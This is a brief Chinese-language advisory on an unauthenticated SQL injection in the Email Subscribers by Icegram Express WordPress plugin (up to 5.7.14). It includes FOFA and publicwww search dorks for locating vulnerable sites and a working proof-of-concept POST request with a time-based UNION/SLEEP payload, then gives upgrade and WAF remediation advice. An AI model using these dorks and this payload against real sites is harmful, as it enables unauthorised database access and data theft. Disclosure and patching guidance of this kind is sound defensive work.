#漏洞描述: WordPress 的 Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce 插件在所有版本(包括 5.7.14)中,由于对用户提供的参数转义不足以及现有 SQL 查询缺乏充分的预处理,其 ‘IG_ES_Subscribers_Query’ 类的 ‘run’ 函数存在 SQL 注入漏洞。这使得未经身份验证的攻击者能够将额外的 SQL 查询附加到现有查询中,从而可用于从数据库中提取敏感信息。
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE
#如何修复? 由于所有版本直至 5.7.14 均被检测出存在该 CVE,建议用户将 Email Subscribers by Icegram Express 插件升级至 5.7.15 版本(或最新版本 5.7.19)。 Patchstack 用户可以选择专门为易受攻击的插件启用自动更新。 部署 WAF/WAAP 解决方案作为额外的防护层。此类解决方案的优势在于,即使该漏洞是新的且未知(0-day),它仍可能通过检测利用模式和技术来阻止攻击。